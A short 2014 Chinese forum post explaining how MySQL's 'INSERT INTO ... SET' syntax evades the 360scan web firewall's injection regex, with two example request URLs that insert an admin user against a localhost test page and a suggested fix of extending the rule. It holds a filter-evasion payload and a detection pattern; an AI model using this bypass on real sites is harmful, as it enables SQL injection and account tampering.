云美公社

云美公社»首页 › IT技术/使用交流 › 电脑病毒论坛 › Mysql语法绕过360scan insert防注入方法

返回列表發新帖

查看: 87|回覆: 0

[服务器安全] Mysql语法绕过360scan insert防注入方法

关注经济金融的壹修

3 主題	0 回帖	0 積分

金币: 0
閲讀權限: 220
精華: 0
威望: 0
贡献: 0
在線時間: 0 小時
註冊時間: 2008-4-24

發消息

發表於 2014-5-7 11:36:41 | 顯示全部樓層 |閲讀模式

360scan正则：INSERT\\s+INTO.+?VALUES

其实Mysql不只可以用insert into xxx values 插入数据，还可以:insert into xxx set xx =

提交：

http://localhost/360.php?sql=insert into user (user,pass) values ('admin','123456')

提交set语法：

http://localhost/360.php?sql=insert into user set user='admin',pass='123456'

修复方法当然最好是加上set了。

回覆

使用道具舉報

返回列表發新帖

Archiver|手机版|小黑屋|云美公社 |nimba_sitemap:appname

相关侵权、举报、投诉及建议等，请发 E-mail：qiongdian@foxmail.com

Powered by Discuz! X5.0 © 2001-2026 Discuz! Team.

在本版发帖返回顶部